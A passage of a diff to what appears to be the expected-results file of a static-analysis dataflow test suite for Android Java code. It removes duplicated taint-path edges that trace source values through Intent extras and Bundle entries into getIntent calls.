| k : String | provenance | | | Test.java:867:44:867:51 | source(...) : String | Test.java:867:24:867:52 | newBundleWithMapKey(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:868:22:868:23 | in : Bundle [] : String | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:65 | | Test.java:868:22:868:23 | in : Bundle [] : String | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:65 | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | provenance | | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | Test.java:869:9:869:40 | getMapKey(...) | provenance | MaD:98 | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:874:16:874:54 | (...)... : Bundle [] : Object | Test.java:875:22:875:23 | in : Bundle [] : Object | provenance | | | Test.java:874:24:874:54 | newBundleWithMapValue(...) : Bundle [] : Object | Test.java:874:16:874:54 | (...)... : Bundle [] : Object | provenance | | | Test.java:874:46:874:53 | source(...) : Object | Test.java:874:24:874:54 | newBundleWithMapValue(...) : Bundle [] : Object | provenance | MaD:176 | | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:875:22:875:23 | in : Bundle [] : Object | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:66 | | Test.java:875:22:875:23 | in : Bundle [] : Object | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:66 | | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | Test.java:876:9:876:42 | getMapValue(...) | provenance | MaD:175 | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:881:16:881:31 | (...)... : Intent | Test.java:882:10:882:11 | in : Intent | provenance | | | Test.java:881:24:881:31 | source(...) : Object | Test.java:881:16:881:31 | (...)... : Intent | provenance | | @@ -1344,27 +1034,19 @@ edges | Test.java:888:65:888:72 | source(...) : String | Test.java:28:29:28:36 | k : String | provenance | | | Test.java:888:65:888:72 | source(...) : String | Test.java:888:45:888:73 | newBundleWithMapKey(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:889:22:889:23 | in : Intent [android.content.Intent.extras, ] : String | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:68 | | Test.java:889:22:889:23 | in : Intent [android.content.Intent.extras, ] : String | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:68 | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | provenance | | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | Test.java:890:9:890:40 | getMapKey(...) | provenance | MaD:98 | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:895:16:895:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:895:24:895:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | Test.java:895:16:895:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:895:45:895:75 | newBundleWithMapValue(...) : Bundle [] : Object | Test.java:895:24:895:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:178 | | Test.java:895:67:895:74 | source(...) : Object | Test.java:895:45:895:75 | newBundleWithMapValue(...) : Bundle [] : Object | provenance | MaD:176 | | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:69 | | Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:69 | | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | Test.java:897:9:897:42 | getMapValue(...) | provenance | MaD:175 | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:902:16:902:31 | (...)... : Intent | Test.java:903:10:903:11 | in : Intent | provenance | | | Test.java:902:24:902:31 | source(...) : Object | Test.java:902:16:902:31 | (...)... : Intent | provenance | | @@ -2001,430 +1683,164 @@ edges | Test.java:1759:4:1759:6 | out [post update] : Intent | Test.java:1760:9:1760:11 | out | provenance | | | Test.java:1759:19:1759:20 | in : String | Test.java:1759:4:1759:6 | out [post update] : Intent | provenance | MaD:89 | | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:18:46:18:64 | source(...) : Object | TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:23:46:23:69 | source(...) : Object | TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:29:46:29:71 | source(...) : Object | TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$AnotherActivity | -| TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$AnotherActivity | -| TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$AnotherActivity | | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:35:46:35:64 | source(...) : Object | TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:40:46:40:69 | source(...) : Object | TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:52:46:52:71 | source(...) : Object | TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:57:46:57:70 | source(...) : Object | TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:62:46:62:69 | source(...) : Object | TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:67:37:67:71 | (...)... : String | TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:67:37:67:71 | (...)... : String | TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] 